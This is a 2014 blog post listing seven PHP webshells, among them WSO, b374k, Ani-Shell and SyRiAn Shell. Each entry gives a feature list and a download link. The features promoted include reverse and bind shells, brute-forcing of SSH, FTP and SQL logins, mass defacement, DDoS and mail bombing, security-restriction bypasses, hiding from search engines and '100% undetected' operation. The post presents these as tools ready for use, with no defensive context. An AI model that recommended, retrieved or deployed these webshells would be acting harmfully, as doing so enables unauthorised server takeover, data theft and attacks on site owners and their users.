Tuesday, September 16, 2014

PHP Webshells



WSO 2.5.1

Features:

- Authorization for cookies
- Server Information
- File manager (copy, rename, move, delete, chmod, touch, creating files and folders)
- View, hexview, editing, downloading, uploading files
- Working with zip archives (packing, unpacking) + compression tar.gz
- Console
- SQL Manager (MySql, PostgreSql)
- Execute PHP code
- Working with Strings + hash search online databases
- Bindport and back-Connect (Perl)
- Bruteforce FTP, MySQL, PgSQL
- Search files, search text in files
- Support for * nix-like and Windows systems
- Antipoiskovik (check User-Agent, if a search engine then returns 404 error)
- You can use AJAX
- Small size. The boxed version is 22.8 Kb
- Choice of encoding, which employs a shell. 
Changelog (v2.5.1):

- Remove comments from the first line .
- Added option to dump certain columns of tables.
- the size of large files are now well defined .
- in the file properties field “Create time” changed to “Change time” (http://php.net/filectime).
- Fixed a bug that caused not working mysql brute force if there was a port of the server .
- Fixed a bug due to which one can not see the contents of a table called download in the database. 
Download: http://pastebin.com/V8XZkGzg

Madspot Shell

Features:

- Process List
- Eval
- SQL Command Panel
- Hash Genration
- Perl and PHP Back Connect
- Zone-h mass defacer
- Powerfull DDOS tool form Server
- Auto Safe mood Off (priv8)
- Whole Server Auto Symlink (Priva8 Coded)
- Perl 500 Internal Error Bypass
- Killcode (Delete Shell)
Download: http://pastebin.com/yfUwW1qu

b374k shell 3.2

Features:

- File manager (view, edit, rename, delete, upload, download, archiver, etc)
- Search file, file content, folder (also using regex)
- Command execution
- Script execution (php, perl, python, ruby, java, node.js, c)
- Give you shell via bind/reverse shell connect
- Simple packet crafter
- Connect to DBMS (mysql, mssql, oracle, sqlite, postgresql, and many more using ODBC or PDO)
- SQL Explorer
- Process list/Task manager
- Send mail with attachment (you can attach local file on server)
- String conversion
- All of that only in 1 file, no installation needed
- Support PHP > 4.3.3 and PHP 5
Download: https://github.com/b374k/b374k


I-47 v1.3

Features:
- Mass Code Injector
- Web Surver Fuzzer
- Mass Mailer + Mail Bomber
- Proxy Installer
- Forums Defacer + Forum Password Changer
- Dos
- Backconnect with perl, c, php
- Bind Shell
- Database Connect & Dump
- Domain info
- PHP Evaluate
- Automatic Symlink creation
- Automatic enable all functions and turn safe mode off
- Download whole website with just one click
- Password Protected
- Zone-h Poster
- Included Bypasser
- Attractive Look

Change Log :

- Included Script Locator
- Included TCP / UDP Scanner
- Included Bruteforcer
- Removed some bugs
Download: http://pastebin.com/m7LGBwUd


Ani-Shell v1.5

Features:
- Shell
- Platform Independent
- Mass Mailer
- Small Web-Server Fuzzer
- Dosser
- Design
- Secure Login
- Deletion of Files
- Bind Shell
- Back Connect
- Fixed Some Coding errors!
- Rename Files
- Encoded Title
- Traceback (Email Alerts)
- PHP Evaluate
- Better Command Execution (even supports older version of PHP)
- Mass Code Injector (Appender and Overwinter)
- Lock Mode Customization
- Mail Bomber (With Less Spam detection feature)
- PHP Decoder
- Anti-Crawler Feature
- MD5 Hash Cracker
- Python Bind-Shell
- Auto Rooter
- PHP Obfuscate
Download: http://sourceforge.net/projects/ani-shell/

SyRiAn Shell V7

Features:
- Mass Defacement Script
- Zone-H Defacer Adder
- Forum Defacer
- PHP Bypasser
- FTP Brute Forcer
- Admin Control Panel Finder
- Encryption
- Back Connection
- Bind Connection
- Eval
- Safe Mode Bypass
- Open_Basedir Bypass
- SQL manager
- 100% Undetected
- DDOS Attack
Download: http://pastebin.com/0jG20snY

P.A.S. v.3.0.x

Features:
- Authorization for the cookies. 

- Encrypt the shell of your password immediately when downloading. 

- File Manager: 
group delete, move, copy, download and download files and directories. 
renaming and creating files and directories. 
edit, view, change file attributes. 
search for files and directories, text files. 

- SQL-client for MySQL, MSSQL, PostgreSQL: 
queries. 
paging table contents. 
dump the database and tables. 

- Bind port (Perl). 

- Back-connect (Perl). 

- Port scanner (PHP). 

- BruteForce based on / etc / passwd for SSH, FTP, POP3, MySQL, MSSQL, PostgreSQL with the ability to customize. 

- Implementation of OS commands and PHP code in different ways. 

- All sorts of useful things ... 

Size: ~ 15 Kb
Download: http://profexer.name/pas/download.php

No comments:

Post a Comment